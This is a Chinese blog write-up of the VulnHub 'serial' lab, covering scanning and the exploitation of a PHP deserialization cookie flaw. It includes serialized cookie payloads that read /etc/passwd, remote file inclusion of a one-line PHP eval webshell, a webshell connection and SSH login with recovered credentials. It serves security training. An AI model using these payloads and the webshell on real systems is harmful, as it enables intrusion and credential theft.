首页 > 其他分享 >反序列化漏洞vulhub靶场serial

反序列化漏洞vulhub靶场serial

时间:2024-08-02 09:24:20浏览次数:18  
标签:vulhub sk4 name 文件 COOKIE User serial 序列化

环境搭建

下载

https://download.vulnhub.com/serial/serial.zip

解压出来就是这种

 你会得到一个这样的文件,这里使用VMware新建一个虚拟机,这里记录比较重要的几部分。

这里就是使用我们刚才下过来的。 

 漏洞过程详解
1.信息收集

打开靶机,在kali虚拟机中进行主机存活探测

arp-scan -l

分析一下,可知靶机IP地址位192.168.3.131

2.端口扫描 

nmap -p- 192.168.3.131 --min-rate=10000(以最小速率10000扫描)

3.目录扫描

可以都访问一下

 在backup目录下发现bak.zip文件,下载下来

4.漏洞扫描

分析文件
index.php

发现三个文件有包含的关系,放到同一文件中分析

<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }


  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }


	if(!isset($_COOKIE['user'])) {
		setcookie("user", base64_encode(serialize(new User('sk4'))));
	} else {
		unserialize(base64_decode($_COOKIE['user']));
	}
	echo "This is a beta test for new cookie handler\n";
?>

发现有三个类,如果用户没有COOKIE,就给用户生成一个名为sk4的COOKIE,否则将用户的COOKIE反序列化;
COOKIE的值为对User对象的序列化结果进行Base64位编码后的结果;
User类中有两个魔法方法,分别为创建和销毁时调用
我们代理抓包,进入repeater模块 

尝试将COOKIE删除,相应包中带来了COOKIE,用户名为sk4

将COOKIE撤销回去

5.尝试更改 COOKIE

选中COOKIE,在burp的解码器中可以看出这里的cookie经过了URL编码,将%3D改成=

 

再次选中COOKIE,将解码方式改为Base64,可以看出结果为User类的序列化结果 

进行Base64解码,修改用户名及其长度

O:4:"User":2:{s:10:"Username";s:5:"mzqms";s:9:"Userwel";O:7:"Welcome":0:{}}7

 

漏洞利用
漏洞存在,思考利用

继续分析代码,发现Wel实例销毁时调用了公共方法hadler,而hadler方法不止在Welcome类中有,在Log类中不仅存在hadler方法,还存在文件包含,所以替换COOKIE中的Welocome实例
由于目标系统为Linux,所以文件包含passwd

这里可以直接用我下面的

O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}

 发现passwd文件显示了出来

尝试远程文件包含

开启Windows系统的服务器,根目录下创建一个1.txt文件

更改COOKIE,要改成自己的window的ip

将1.txt改为一句话木马

<?php
@eval($_POST['cmd']);
?>
 打开蚁剑连接将Cookie放入Http头中

 测试连接连接成功

浏览目录,发现根目录下有credentials.txt.bak文件

应该是sk4用户的密码,由于22端口开启,尝试远程连接
ssh [email protected]

登陆成功,依旧浏览目录,发现flag
 

标签:vulhub,sk4,name,文件,COOKIE,User,serial,序列化
From: https://blog.csdn.net/weixin_45790890/article/details/140853280

相关文章

  • 15. 序列化模块json和pickle、os模块
    1.序列化模块 1.1序列化与反序列化(1)序列化将原本的python数据类型字典、列表、元组转换成json格式字符串的过程就叫序列化(2)反序列化将json格式字符串转换成python数据类型字典、列表、元组的过程就叫反序列化(3)为什么要序列化计算机文件中没有字典这种数据类型,将字典中......
  • contiguous、continuous、continual、serial、adjacent、consecutive和successive的区
    contiguous:表示连续、完整、不间断。比如一张纸,它是contiguous的,撕开再拼上,他就只能是consecutive的continuous:表示某事一直持续,没有停顿serial:系列。表示一连串相同的或者类似的或者有共同特征的东西。强调共同特征。adjacent:相邻。与consecutive的区别是,consecutive强调没有......
  • 代码审计: ThinkPHP V6.0.12LTS反序列化漏洞复现
    这里写目录标题源码下载一、前缀知识事件回调:二、代码审计查找反序列化路由三、利用链分析构造exp源码下载在我的个人免费资源里面一、前缀知识事件回调:概念:在某个特定事件发生时,系统会调用预先定义好的函数(即回调函数)来处理该事件。回调函数通常作为参数传递给......
  • 3.校验,格式化,ModelSerializer使用
    【一】反序列化校验1)三层校验字段自己校验直接写在字段类的属性上局部钩子在序列化中写validata_字段名全局钩子#serializers.pyclassBookSerializer(serializers.Serializer):#1)name字段的要大于1小于10name=serializers.CharField(min_length=......
  • 2.Request,Response和序列化类
    【一】不同编码格式的http请求django视图类或视图函数的request#只针对post请求的urlencoded编码格式才有数据(<QueryDict:{"a":"a"}>)request.POST#请求地址框中获得数据(<QueryDict:{"a":["a"]}>)request.GET #只取一个request.GET.get('key')......
  • 【BUUCTF】AreUSerialz
    【BUUCTF】AreUSerialz(反序列化)题目来源收录于:BUUCTF网鼎杯2020青龙组题目描述根据PHP代码进行反序列化<?phpinclude("flag.php");highlight_file(__FILE__);classFileHandler{protected$op;protected$filename;protected$content;......
  • 二进制序列化和字符串序列化
    经常用json字符串序列化,倒是忘记也可做二进制序列化。在文件上传时,如果序列化为字符串,再按字符串上传,这样是否会数据量变大呢?今天试了试两种序列化方式:dotnet自带的BinaryFormatter和Newtonsoft privatevoidbutton3_Click(objectsender,EventArgse){......
  • vulhubXXE靶机
    将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254kali本机ip根据对比可知XXE的一个ip地址为192.168.134.134,并开放了80端口在浏览器访问http://192.168.134.134对网站进行目录和......
  • Unity数据持久化——序列化/二进制/Json/PlayerPrefs
    序列化序列化是指把对象转换为字节序列的过程,而反序列化是指将字节序列恢复为对象的过程。序列化最主要的用途就是传递对象和保存对象。在Unity中保存和加载、prefab、Scene、Inspector窗口、实例化预制体等都使用了序列化和反序列化。下面是一个序列化和反序列化的例子......
  • Laravel序列化解码:深入Eloquent模型的序列化机制
    Laravel序列化解码:深入Eloquent模型的序列化机制引言Laravel作为一门优雅的PHPWeb开发框架,提供了许多便利的功能来简化开发过程。其中一个强大而易用的功能便是模型的序列化。序列化是将对象状态转换为可以存储或传输的格式的过程。在Laravel中,EloquentORM支持模型的自......